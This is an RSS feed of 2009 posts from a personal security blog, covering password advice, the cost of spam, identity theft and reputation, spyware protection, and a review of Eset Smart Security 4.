<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Michael M. Knight &#187; Security</title>
	<atom:link href="http://www.michaelmknight.co.uk/tag/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.michaelmknight.co.uk</link>
	<description>Quis custodiet ipsos custodes?</description>
	<lastBuildDate>Fri, 16 Apr 2010 14:21:27 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Password Advice</title>
		<link>http://www.michaelmknight.co.uk/2009/08/password-advice/</link>
		<comments>http://www.michaelmknight.co.uk/2009/08/password-advice/#comments</comments>
		<pubDate>Wed, 12 Aug 2009 23:28:41 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Data Protection]]></category>
		<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Advice]]></category>
		<category><![CDATA[help]]></category>
		<category><![CDATA[password]]></category>

		<guid isPermaLink="false">http://www.michaelmknight.co.uk/?p=200</guid>
		<description><![CDATA[Your passwords are the keys you use to access personal information that you&#8217;ve stored on your computer and in your online accounts.
If criminals or other malicious users steal this information, they can use your name to open new credit card accounts, apply for a mortgage, or pose as ...]]></description>
			<content:encoded><![CDATA[<p>Your passwords are the keys you use to access personal information that you&#8217;ve stored on your computer and in your online accounts.</p>
<p>If criminals or other malicious users steal this information, they can use your name to open new <strong>credit card</strong> accounts, apply for a mortgage, or pose as you in online transactions. In many cases you would not notice these attacks until it was too late.</p>
<p>Fortunately, it is not hard to create strong passwords and keep them well protected.</p>
<p><strong>What makes a strong password</strong></p>
<p>To an attacker, a strong password should appear to be a random string of characters. The following criteria can help your passwords do so:</p>
<p>Make it lengthy. Each character that you add to your password increases the protection that it provides many times over. Your passwords should be 8 or more characters in length; 14 characters or longer is ideal.</p>
<p>Many systems also support use of the space bar in passwords, so you can create a phrase made of many words (a &#8220;<strong>pass phrase</strong>&#8221;). A pass phrase is often easier to remember than a simple password, as well as longer and harder to guess.</p>
<p>Combine letters, numbers, and symbols. The greater variety of characters that you have in your password, the harder it is to guess. Other important specifics include:</p>
<p><strong>The fewer types of characters</strong> in your password, the longer it must be. A 15-character password composed only of random letters and numbers is about 33,000 times stronger than an 8-character password composed of characters from the entire keyboard. If you cannot create a password that contains symbols, you need to make it considerably longer to get the same degree of protection. An ideal password combines both length and different types of symbols.</p>
<p><strong>Use the entire keyboard</strong>, not just the most common characters. Symbols typed by holding down the &#8220;Shift&#8221; key and typing a number are very common in passwords. Your password will be much stronger if you choose from all the symbols on the keyboard, including punctuation marks not on the upper row of the keyboard, and any symbols unique to your language.</p>
<p><strong>Use words and phrases</strong> that are easy for you to remember, but difficult for others to guess. The easiest way to remember your passwords and pass phrases is to write them down. Contrary to popular belief, there is nothing wrong with writing passwords down, but they need to be adequately protected in order to remain secure and effective.</p>
<p>In general, passwords written on a piece of paper are more difficult to compromise across the Internet than passwords kept in a password manager, on a Web site, or in any other software-based storage tool.</p>
<p><strong>Create a strong, memorable password in 6 steps</strong></p>
<p>Use these steps to develop a strong password:</p>
<p>1. Think of a sentence that you can remember. This will be the basis of your strong password or pass phrase. Use a memorable sentence, such as &#8220;My son Aiden is three years old.&#8221;</p>
<p>2. Check if the computer or online system supports the pass phrase directly. If you can use a pass phrase (with spaces between characters) on your computer or online system, do so.</p>
<p>3. If the computer or online system does not support pass phrases, convert it to a password. Take the first letter of each word of the sentence that you&#8217;ve created to create a new, nonsensical word. Using the example above, you&#8217;d get: &#8220;msaityo&#8221;.</p>
<p>4. Add complexity by mixing uppercase and lowercase letters and numbers. It is valuable to use some letter swapping or misspellings as well. For instance, in the pass phrase above, consider misspelling Aiden&#8217;s name, or substituting the number 3 for the word &#8220;three&#8221;. There are many possible substitutions, and the longer the sentence, the more complex your password can be. Your pass phrase might become &#8220;My SoN Ayd3N is 3 yeeRs old.&#8221; If the computer or online system will not support a pass phrase, use the same technique on the shorter password. This might yield a password like &#8220;MsAy3yo&#8221;.</p>
<p>5. Finally, substitute some special characters. You can use symbols that look like letters, combine words (remove spaces) and other ways to make the password more complex. Using these tricks, we create a pass phrase of &#8220;MySoN 8N i$ 3 yeeR$ old&#8221; or a password (using the first letter of each word) &#8220;M$8ni3y0&#8221;.</p>
<p>6. Test your new password with a <strong>Password Checker</strong>. A Password Checker is a non-recording feature on this <a title="Password Checker" href="http://www.michaelmknight.co.uk?wp_ct=2" target="_blank">Web site</a> that helps determine your password&#8217;s strength as you type.</p>
<p><strong>Password strategies to avoid</strong></p>
<p>Some common methods used to create passwords are easy to guess by criminals. To avoid weak, easy-to-guess passwords:</p>
<p><strong>Avoid sequences</strong> or repeated characters. &#8220;12345678,&#8221; &#8220;222222,&#8221; &#8220;abcdefg,&#8221; or adjacent letters on your keyboard do not help make secure passwords.</p>
<p><strong>Avoid using only look-alike</strong> substitutions of numbers or symbols. Criminals and other malicious users who know enough to try and crack your password will not be fooled by common look-alike replacements, such as replacing an &#8216;i&#8217; with a &#8216;1&#8217; or an &#8216;a&#8217; with an &#8216;@&#8217;, as in &#8220;M1cr0$0ft&#8221; or &#8220;P@ssw0rd&#8221;. But these substitutions can be effective when combined with other measures, such as length, misspellings, or variations in case, to improve the strength of your password.</p>
<p><strong>Avoid your login name</strong>. Any part of your name, birthday, social security number, or similar information for your loved ones constitutes a bad password choice. This is one of the first things criminals will try.</p>
<p><strong>Avoid dictionary words in any language</strong> &#8211; Criminals use sophisticated tools that can rapidly guess passwords that are based on words in multiple dictionaries, including words spelled backwards, common misspellings, and substitutions. This includes all sorts of profanity and any word you would not say in front of your children.</p>
<p><strong>Avoid using the same password everywhere</strong> &#8211; If any one of the computers or online systems using this password is compromised, all of your other information protected by that password should be considered compromised as well. It is critical to use different passwords for different systems.</p>
<p><strong>Avoid using online storage</strong> &#8211; If malicious users find these passwords stored online or on a networked computer, they have access to all your information.</p>
<p><strong>The &#8220;blank password&#8221; option</strong></p>
<p>A blank password (no password at all) on your account is more secure than a weak password such as &#8220;1234&#8221;. Criminals can easily guess a simplistic password, but on computers using Windows XP/Vista or Windows 7, an account without a password cannot be accessed remotely by means such as a network or the Internet. (This option is not available for Microsoft Windows 2000, Windows Me, or earlier versions.) You can choose to use a blank password on your computer account if these criteria are met:</p>
<ul>
<li>You only have one computer, or you have several computers but you do not need to access information on one computer from another one</li>
<li>The computer is physically secure (you trust everyone who has physical access to the computer)</li>
</ul>
<p>The use of a blank password is not always a good idea. For example, a laptop computer that you take with you is probably not physically secure, so on those you should have a strong password.</p>
<p><strong>How to access and change your passwords</strong></p>
<p><span style="color: #000000;"><strong>Online accounts</strong></span></p>
<p>Web sites have a variety of policies that govern how you can access your account and change your password. Look for a link (such as &#8220;my account&#8221;) somewhere on the site&#8217;s home page that goes to a special area of the site that allows password and account management.</p>
<p><strong>Computer passwords</strong></p>
<p>The Help files for your computer operating system will usually provide information about how to create, modify, and access password-protected user accounts, as well as how to require password protection upon startup of your computer. You can also try to find this information online at the software manufacturer&#8217;s Web site. For example, if you use Microsoft Windows XP, online help can show you how to manage passwords, change passwords, and more.</p>
<p><strong>Keep your passwords secret</strong></p>
<p>Treat your passwords and pass phrases with as much care as the information that they protect.</p>
<p><strong>Don&#8217;t reveal them to others</strong> &#8211; Keep your passwords hidden from friends or family members (especially children) who could pass them on to other less trustworthy individuals. Passwords that you need to share with others, such as the password to your online banking account that you might share with your spouse, are the only exceptions.</p>
<p><strong>Protect any recorded passwords</strong> &#8211; Be careful where you store the passwords that you record or write down. Do not leave these records of your passwords anywhere that you would not leave the information that they protect.</p>
<p><strong>Never provide your password</strong> over e-mail or based on an e-mail request. Any e-mail that requests your password or requests that you go to a Web site to verify your password is almost certainly a fraud. This includes requests from a trusted company or individual. E-mail can be intercepted in transit, and e-mail that requests information might not be from the sender it claims. Internet &#8220;phishing&#8221; scams use fraudulent e-mail messages to entice you into revealing your user names and passwords, steal your identity, and more.</p>
<p><strong>Change your passwords regularly</strong> &#8211; This can help keep criminals and other malicious users unaware. The strength of your password will help keep it good for a longer time. A password that is shorter than 8 characters should be considered only good for a week or so, while a password that is 14 characters or longer (and follows the other rules outlined above) can be good for several years.</p>
<p><strong>Do not type passwords</strong> on computers that you do not control. Computers such as those in Internet cafés, computer labs, shared systems, kiosk systems, conferences, and airport lounges should be considered unsafe for any personal use other than anonymous Internet browsing. Do not use these computers to check online e-mail, chat rooms, bank balances, business mail, or any other account that requires a user name and password. Criminals can purchase keystroke logging devices for very little money and they take only a few moments to install. These devices let malicious users harvest all the information typed on a computer from across the Internet—your passwords and pass phrases are worth as much as the information that they protect. Windows has an On-Screen Keyboard that you can use if need be. Press <strong>Start </strong>&gt; <strong>Run</strong>, type <strong>OSK</strong> and click OK. Now use the mouse to type in a password.</p>
<div id="attachment_201" class="wp-caption aligncenter" style="width: 516px"><img class="size-full wp-image-201" title="osk" src="http://www.michaelmknight.co.uk/wp-content/uploads/2009/08/osk.png" alt="Windows 7 On Screen Keyboard" width="506" height="157" /><p class="wp-caption-text">Windows 7 On Screen Keyboard</p></div>
<p><strong>What to do if your password is stolen</strong></p>
<p>Be sure to monitor all the information you protect with your passwords, such as your monthly financial statements, credit reports, online shopping accounts, and so on. Strong, memorable passwords can help protect you against fraud and identity theft, but there are no guarantees. No matter how strong your password is, if someone breaks into the system that stores it, they will have your password. If you notice any suspicious activity that could indicate that someone has accessed your information, notify authorities as quickly as you can.  If you need further help on what to do if you think your identity has been stolen or you&#8217;ve been similarly defrauded, then contact me.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/08/password-advice/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The True Cost of Spam</title>
		<link>http://www.michaelmknight.co.uk/2009/03/the-true-cost-of-spam/</link>
		<comments>http://www.michaelmknight.co.uk/2009/03/the-true-cost-of-spam/#comments</comments>
		<pubDate>Wed, 25 Mar 2009 22:10:14 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Data Protection]]></category>
		<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Hoax]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[cost]]></category>
		<category><![CDATA[loss of business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.michaelmknight.co.uk/?p=131</guid>
		<description><![CDATA[Junk email may be costing your company more than you think; here’s how to add up the real costs.
Spam may be cheap for the people who send it, but it can be a serious expense for your business. According to a study conducted earlier this year by Nucleus ...]]></description>
			<content:encoded><![CDATA[<p><strong>Junk email may be costing your company more than you think; here’s how to add up the real costs.</strong></p>
<p><a class="t" rel="nofollow" href="http://en.wikipedia.org/wiki/Spam_%28electronic%29" target="_blank">Spam</a> may be cheap for the people who send it, but it can be a serious expense for your business. According to a study conducted earlier this year by <strong>Nucleus Research Inc</strong>., spam management costs businesses more than £/$ 150 billion annually in lost productivity — £/$ 1400 per employee.</p>
<p>Here&#8217;s a quick look at the various ways that spam drains your company&#8217;s bank account and how you can calculate the real cost to your business.</p>
<p><strong>Anti-Spam Technology</strong>: Spam-fighting products and services are a big business, and anti-spam vendors aren&#8217;t generating their revenue from the people sending junk email. Most companies not only spend thousands of dollars on anti-spam software and hardware solutions, but they also drop cash on employees and consultants to plan, deploy and maintain the technologies.</p>
<p><strong>Lost Productivity</strong>: Spam wastes employees&#8217; time. The average employee spends 16 seconds reviewing and deleting each spam message, according to Nucleus Research. The company estimates that at businesses that quarantine spam (where junk messages are placed in a directory for review and confirmation by recipients), each user spends an average of 4.5 minutes per week reviewing messages. Deleting messages, however, turns out to be the most expensive spam strategy. The average employee at companies that delete spam messages loses an average of 7.3 minutes per week looking for lost legitimate messages.<span id="more-131"></span></p>
<p><strong>Wasted Storage</strong>: Companies that quarantine spam must add extra storage capacity to accommodate suspicious mail so that users can review it at their leisure. But many users never bother to review their quarantined messages, so the email just sits there, consuming storage space and money.</p>
<p><strong>Internet Service Cost Pass-Alongs</strong>: This number is difficult to calculate. Still, it would be naive to believe that ISPs aren&#8217;t passing along junk email&#8217;s tremendous costs to their customers. In an October 2007 report, anti-spam software vendor <strong><span class="t">Symantec Corp</span></strong>. estimated that 70 percent of all email was spam. The traffic burden created by junk email forces ISPs to add extra network and server capacity, as well as to install their own anti-spam solutions.</p>
<p><strong>An Intangible Cost</strong>: Spam has a broader economic impact as well, hitting many businesses and nations that are least able to bear the burden. Consider Nigeria, for example. Nucleus Research noted that while fraud and corruption have been rampant in Nigeria for some time, the country may be forever kept in the digital darkness because of the volume of deceptive email sent by local spammers. The research firm noted that most spam filters block any mail with &#8220;Nigeria&#8221; in the title or text, effectively keeping anyone communicating with, from, to or about Nigeria from doing it via email.</p>
<blockquote><p>Nigerian scams are also known as 419 Fraud, so named from the code given to email fraud in Nigeria.</p></blockquote>
<p><strong>Your Cost</strong>: If you&#8217;re interested in seeing just how much spam is costing your business, use <strong>Computer Mail Services Inc.&#8217;s</strong> <a class="t" rel="nofollow" href="http://www.cmsconnect.com/Marketing/spamcalc.htm" target="_blank">spam-cost calculator</a>. For a second opinion, check out the <strong>Sendio </strong><a class="t" rel="nofollow" href="http://www.sendio.com/spamCalc/" target="_blank">spam-cost calculator</a>.</p>
<p>Other spam-cost calculators are available at <a class="t" rel="nofollow" href="http://www.networkworld.com/spam/index.jsp" target="_blank">NetworkWorld.com</a>, <a class="t" rel="nofollow" href="http://www.networkcomputing.com/project/spamcalc.jhtml" target="_blank">Network Computing</a> and <a class="t" rel="nofollow" href="http://www.commtouch.com/site/Resources/calculator.asp" target="_blank">Commtouch</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/03/the-true-cost-of-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Future of Identity</title>
		<link>http://www.michaelmknight.co.uk/2009/03/the-future-of-identity/</link>
		<comments>http://www.michaelmknight.co.uk/2009/03/the-future-of-identity/#comments</comments>
		<pubDate>Sat, 14 Mar 2009 06:13:10 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Data Protection]]></category>
		<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.michaelmknight.co.uk/?p=92</guid>
		<description><![CDATA[The Internet has shown that reputations are important but don&#8217;t have to be tied to specific real individuals. The entire banking system is built on top of the idea of reputation, but tries hard to tie them to real identities. The problem of identity theft is likely to break this ...]]></description>
			<content:encoded><![CDATA[<p>The Internet has shown that reputations are important but don&#8217;t have to be tied to specific real individuals. The entire banking system is built on top of the idea of reputation, but tries hard to tie them to real identities. The problem of identity theft is likely to break this connection. We will see a greater disconnect between individuals and their reputations.</p>
<p>Identity theft has been a big hit with the purveyors of fear in recent years. We all now live in terror of waking up one morning and finding that someone has stolen our identity, and we can’t even remember who we are.</p>
<p>Well, maybe not. But identity theft is a real problem. If someone manages to construct a copy of your identity, you don’t stop being you, you just stop being the owner of all of your money (unless you can persuade your bank it’s their fault). You might get back from vacation to find that your house has been stolen&#8230;</p>
<p>Identity is closely tied to the concept of reputation. We are now trying to apply ideas from villages of a few hundred people to a global scale and (not surprisingly) finding that they don’t quite work.</p>
<p>In a small community, everyone knows—or knows of—everyone else. Reputations are very important. If you want to borrow something from a neighbour, or ask them for a favour, then you will have some idea of how much you trust them.</p>
<p>When banks started, they would use this sort of model. They would be willing to lend you money based on letters of recommendation from people they trusted, or based on their prior dealings.</p>
<p>Now banks have grown so big that they use a much less personal system, but still deal in the idea of reputations.</p>
<p><strong>The Social Security Scam</strong></p>
<p>Some time ago, the UK and the U.S. governments introduced the concept of a Social Security number (SSN). This was a unique identifier assigned to every taxpaying citizen, allowing their tax records to be connected together.</p>
<p>Having a unique identifier for people was useful to a lot of institutions. It’s pretty hard to know whether you can trust John Smith, but it’s much easier to find out information about a specific John Smith.</p>
<p>The problem began when people started regarding knowing someone’s Social Security number as proof (or, at least, strong evidence) that you were that person.</p>
<p>This attitude isn’t limited to SSNs, by the way. One of my banks has an ultra-secure login where, in addition to my password, they also require that I tell them the following information:</p>
<ul>
<li> My mother’s maiden name</li>
<li> My house number</li>
<li> My date of birth</li>
</ul>
<p>All these responses are public knowledge and can be looked up by anyone who wants to find them out.</p>
<p>The most surreal experience I’ve had with a bank was one based in the United States. I phoned them to try to set up Internet banking. The conversation went something like this:</p>
<p><strong> Me</strong>: Hi, I’d like to know my password for Internet banking, please.</p>
<p><strong>Them</strong>: Certainly. We just need to confirm your identity. Can you tell me the size of the last transaction in your account, please?</p>
<p><strong>Me</strong>: No, I want to log into Internet banking to look that up.</p>
<p><strong>Them</strong>: Oh, we can tell you that over the phone.</p>
<p><strong>Me</strong>: Okay&#8230;</p>
<p><strong>Them</strong>: £n</p>
<p><strong>Me</strong>: Thanks. The answer to your question is £n.</p>
<p><strong>Them</strong>: Oh, I can’t ask you things I’ve just told you as a security question.</p>
<p><strong>Me</strong>: Well, that’s sensible.</p>
<p><strong>Them</strong>: Let me transfer you to someone who can.</p>
<p><strong>Me</strong>: !</p>
<p>The next person I talked to asked me for the number that the first representative had given me, and was then happy to pass on my Internet banking password.</p>
<p>The illusion of security seems very popular with banks at the moment.</p>
<p><strong>Reputation versus Identity</strong></p>
<p>Part of the problem with this system is that it associates your reputation with your identity. If you are going to buy a house and are looking for a mortgage, then it is not unreasonable for a potential lender to want to know about the house you are thinking of buying, your current income, earning potential, outstanding debts, and so on.</p>
<p>If, on the other hand, you are looking to take out a credit card with a £1,000 credit limit, the only thing they need to know is whether you can service a debt of £1,000.</p>
<p>Either you have £1,000 in liquid assets, or you have enough disposable income to service interest payments at the horrendous rates that credit card companies charge.</p>
<p>Unfortunately, the way the system is set up at the moment, there is no fine-grained control. Someone who uses a £1,000 credit card application to steal your identity gets enough to take out a £500,000 mortgage backed by your reputation.</p>
<p>A bigger problem is what to do after your identity has been stolen. Fingerprint locks are pretty cheap now, but most people still prefer to use pass codes. The reason is, if someone steals a pass code, you can change it.</p>
<p>If someone steals a copy of your fingerprint, it’s very difficult to grow a new finger. The current situation with identities is similar to the fingerprint lock. So much of the information associated with your virtual identity is tied to the real you that building a new one that the thief does not have access to is very hard.</p>
<p><strong>Multiple Personalities</strong></p>
<p>One solution to this problem would be to have multiple virtual identities. This is already quite common outside of financial circles.</p>
<p>I have an account on <a class="t" href="http://www.slashdot.com/" target="_blank">Slashdot</a>, for example, where I post under a pseudonym. Someone who cared enough could probably link that virtual identity to me fairly easily, but most of the time it can be treated as a separate persona. It has an independent reputation, based on Slashdot’s karma system.</p>
<p>Since I post more informative comments than troll posts (or, at least, most of my attempts at trolling go unnoticed), that persona has a good reputation. That reputation, however, is in no way related to the reputation I have as a result of writings published in other places.</p>
<p>The idea of multiple personalities would make sense for financial markets, too. Going back to the earlier example, if I wanted to apply for a credit card, then I would not have to use my real identity to do so. I could create a new identity and have my real identity guarantee it up to a certain limit that would be sensible for the credit application.</p>
<p>From the credit card company’s perspective, the identity would have a fixed income of some proportion of my income and a fixed capital of some proportion of my capital. They would be isolated from my real identity and only see the subset of my assets that were required to construct an identity that was a safe risk for lending money to.</p>
<p>This kind of game isn’t particularly new. Corporations do it all the time. They set up shell companies, spin-offs, or joint ventures for a variety of purposes. Some have to do with combining resources from different companies; some have to do with shielding the parent organization from liability.</p>
<p>Both of these would be useful for individuals. Couples sharing a house, for example, might want to create a phantom shared identity rather than having individual responsibility for various payments. Limiting liability is the more important one, however.</p>
<p>The concept of limited liability has to do with limiting the amount of money you can lose. In simple terms, if a limited liability company goes bust, the investors don’t lose any money beyond that which they had invested already. Banks know this, and will not take the investors’ assets into account when assessing the risk involved with lending the limited company money.</p>
<p>Putting this in terms of identity theft, someone who could pose as the limited company would be able to do only a small amount of damage to the investors.</p>
<p>This kind of structure would be ideal for limiting the effects of identity theft. When applying for small loans, you could create a limited liability identity, and an identity thief who took it would not gain any more than a thief who took a credit card.</p>
<p><strong>Fluidity of Identity</strong></p>
<p>The Internet has shown time and time again that reputations are important, but don’t have to be tied to specific real individuals. The entire banking system is built on top of the idea of reputation, but tries hard to tie them to real identities.</p>
<p>The problem of identity theft is likely to break this connection. We will see a greater disconnect between individuals and their reputations.</p>
<p>Corporations already do this with different branding for different market segments, and it’s only a matter of time before the facilities become more widely available.</p>
<p>The designers of the Secure Internet Live Chat (SILC) protocol realized this some years ago. SILC does not provide a mechanism for tying an online personality to a real person (although you can do this out of band).</p>
<p>Instead, it provides something more valuable: a way of telling whether a particular online identity corresponds to the same person today as it did yesterday. This is valuable in an online chat setting, because the only contact you are likely to have with a particular person in an Internet chat room is via that chat room. The reputation is based entirely on their behaviour in that context.</p>
<p>The same is true in many other contexts: the behaviour of individuals in a specific context is what matters, and their actions in other contexts can be misleading. My advice: <strong>protect yourself at all costs</strong> and be careful whom you hand your information to. Remember that governments and legal bodies keep losing your data, either because they are careless, because they don&#8217;t have proper facilities in place to safeguard it, or because they just don&#8217;t care.</p>
<p>What do you think is the Future of Identity?</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/03/the-future-of-identity/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Protecting Your Privacy on the Internet</title>
		<link>http://www.michaelmknight.co.uk/2009/03/protecting-your-privacy-on-the-internet/</link>
		<comments>http://www.michaelmknight.co.uk/2009/03/protecting-your-privacy-on-the-internet/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 19:39:25 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Forensic]]></category>
		<category><![CDATA[Information]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[dangers]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[protect]]></category>

		<guid isPermaLink="false">http://www.michaelmknight.co.uk/?p=83</guid>
		<description><![CDATA[What are some of the most basic security threats to your computer? Find out in this article, and learn drastic steps that can be taken to protect yourself and your system.
The IT security world has now enriched its vocabulary with such notions as spyware, adware, phishing, zombie PCs, ...]]></description>
			<content:encoded><![CDATA[<p><strong>What are some of the most basic security threats to your computer? Find out in this article, and learn drastic steps that can be taken to protect yourself and your system.</strong></p>
<p>The IT security world has now enriched its vocabulary with such notions as spyware, adware, <a class="t" rel="nofollow" href="http://en.wikipedia.org/wiki/Phishing" target="_blank">phishing</a>, <a class="t" rel="nofollow" href="http://en.wikipedia.org/wiki/Zombie_computer" target="_blank">zombie PCs</a>, <a class="t" rel="nofollow" href="http://en.wikipedia.org/wiki/E-mail_spam" target="_blank">spam robots</a>, etc. Software to protect against all this malware has appeared accordingly. Some developers offer specialised utilities; others supply whole packages of applications for removing various malicious modules. These programs can be effective and can thoroughly “clean” the system, but only if they can also prevent <a class="t" rel="nofollow" href="http://en.wikipedia.org/wiki/Zero_day" target="_blank">zero-day threats</a> from entering the PC.</p>
<p>Recently the number of Internet threats to users&#8217; PCs has risen dramatically. Last October, as a result of research led under America Online and National Cyber Security Alliance initiatives, traces of spyware activity were found on more than 80% of users&#8217; computers. The subject is relevant, so it&#8217;s time to talk about spyware, why users&#8217; PCs are vulnerable, and how to protect your computer from spyware attacks.</p>
<p><strong>What is spyware?</strong></p>
<p>Spyware is a general term for software that traces user activity on the PC and collects personal or confidential data without the user&#8217;s consent. Spyware can log the websites you visit, the times of your visits, and every keystroke (this is how credit card numbers and PINs are often stolen), or secretly monitor and record which software is installed on the PC.</p>
<p>The most dangerous spyware is that which self-replicates via e-mail and installs itself without your consent by exploiting software bugs. Software that intercepts e-mails and instant messages can collect confidential information and transmit it over the Internet, and is also a valid security concern. Some software may also change the settings of installed security software without your consent. All this makes your computer vulnerable to spyware attacks. Depending on the type of spyware, some programs report to their developer which applications users run on their PCs, while others open holes for intrusion into the system, or set the modem to make calls for which the PC owner will eventually be billed. Recently, some shareware programs have been classed as spyware because they extract files from your computer without your consent. One of the most dangerous features of spyware is the ability to transmit the collected information to the developer’s PC.</p>
<p>Spyware can enter your PC in a number of different ways. The most common is via e-mail or a Web browser. Such software may also be bundled with “useful” software and downloaded when the “useful” program starts up. Generally such programs are bundled with popular free software downloaded from the Internet, or distributed on CDs attached to magazines.</p>
<p><strong>Why is spyware dangerous?</strong></p>
<p>Spyware doesn’t have much influence on the way your PC runs. Usually it doesn’t contain viruses; however, it can consume a huge amount of system resources. Where spyware does real damage is data confidentiality. Spyware programs record every step the user takes, both inside the system and on the Internet. All of this information is delivered to the malefactor, who collects the data in his interest, not yours!</p>
<p><strong>How do I protect my PC from spyware?</strong></p>
<p>Most spyware programs are bundled with freeware that you have to install on your computer, but some are downloaded automatically when you visit a Web site. If a message pops up on your screen proposing that you install a program to gain access to the Web site&#8217;s content, don&#8217;t hurry to press “OK” without checking the software. If there is no need to install special software to view the Web site, it’s better to decline the extra download.</p>
<p>On some Web sites you can find lists of programs that contain harmful spy modules. Checking these lists can help you learn whether such programs have been installed on your computer. Sometimes system behaviour such as slow typing, periodic alerts from installed firewalls, requests to unknown Web sites, reduced system and network performance, and the discovery of suspicious files may indicate that spyware is present. The best way to protect your computer from spyware is to install specialised anti-spyware software.</p>
<p><strong>Security Tools</strong></p>
<p>A firewall is considered to be the most popular tool for protecting a computer from spyware. Firewalls are integrated into operating systems (OS) and continuously examine the source and destination addresses of traffic on the computer&#8217;s network ports. They analyse packets arriving on Internet and mail ports according to the type of request and the destination. Most firewalls allow or deny certain addresses, but this is a weak point, because spyware may be embedded in many packets or disguised as a Web browser. This type of spyware cannot be detected by a firewall, and gets inside the PC to start its malicious activity. Also, firewalls are usually resource-consuming, so the price of relative security is your PC running much slower.</p>
<p>The problem of a firewall&#8217;s merely relative protection is solved by proactive security systems. Such systems analyse all application activity on the PC for potential maliciousness, according to predefined rules for malicious and benign behaviour. In case of a real threat, proactive systems block dangerous programs before any damage to the OS is done.</p>
<p>An anti-spyware solution called Safe’n’Sec+Anti-Spyware combines the Safe’n’Sec behaviour analyser &#8212; which blocks previously unknown spyware (new modifications) &#8212; with an Anti-Spyware module, which detects already known spyware with the help of extended anti-spyware signature databases. The Anti-Spyware module can also delete malware from the user&#8217;s PC. The solution is fully compatible with any traditional security software installed on your computer. Anti-spyware solutions efficiently protect your confidential data from unauthorised access, whether you are working in the system or just browsing the Internet.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.michaelmknight.co.uk/2009/03/protecting-your-privacy-on-the-internet/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Eset Smart Security</title>
		<link>http://www.michaelmknight.co.uk/2009/03/73/</link>
		<comments>http://www.michaelmknight.co.uk/2009/03/73/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 08:12:22 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Outlook]]></category>
		<category><![CDATA[Review]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Anti-Virus]]></category>
		<category><![CDATA[Eset]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[New Version]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[Spyware]]></category>

		<guid isPermaLink="false">http://www.michaelmknight.co.uk/?p=73</guid>
		<description><![CDATA[I have used Eset&#8217;s products for many years now and swear by them. The release of version 4 again impresses  me. The interface has been redesigned as well as the pop-up notifications. They seem to glow with pleasing bright colours. I was impressed with the Beta versions that I tested ...]]></description>
			<content:encoded><![CDATA[<p>I have used Eset&#8217;s products for many years now and swear by them. The release of version 4 again impresses me. The interface has been redesigned, as have the pop-up notifications. They seem to glow with pleasing bright colours. I was impressed with the Beta versions that I tested for ESET. Now it&#8217;s fully released, here&#8217;s my review.</p>
<p>Version 4 covers ESET&#8217;s award-winning anti-malware solutions, ESET NOD32 Antivirus and ESET Smart Security, for consumers and businesses. The new versions build on ESET&#8217;s ThreatSense, the industry&#8217;s most accurate proactive technology for detecting viruses and other malware, by adding over 20 new capabilities that improve malware detection, enhance system diagnostics and recovery, and improve management. The latest release continues ESET&#8217;s tradition of delivering ultimate security with fast, transparent operation and minimal load on system memory, disk or CPU. ESET&#8217;s unrivalled ability to deliver industry-leading proactive malware detection and high system performance can literally extend the life of PCs and laptops while improving their security.</p>
<p><img class="aligncenter size-full wp-image-77" title="New graphs" src="http://www.michaelmknight.co.uk/wp-content/uploads/2009/03/eset1.jpg" alt="New graphs" width="512" height="376" /></p>
<p>&#8216;In an increasingly complex threat environment, anti-malware solution providers are tasked with packing even more security features into endpoint security products, but must be conscious of system performance when doing so,&#8217; said Andrew Hanson, research analyst, Security Products, IDC. &#8216;Current economic pressures are causing businesses to extend or freeze PC-replacement cycles, but security expenditures are still required to address the growing threat landscape. Leading security vendors will provide cost effective solutions that successfully integrate multiple layers of protection, while extending the life of the computer by conserving system resources and maintaining performance - all at a price point businesses and consumers can afford.&#8217;</p>
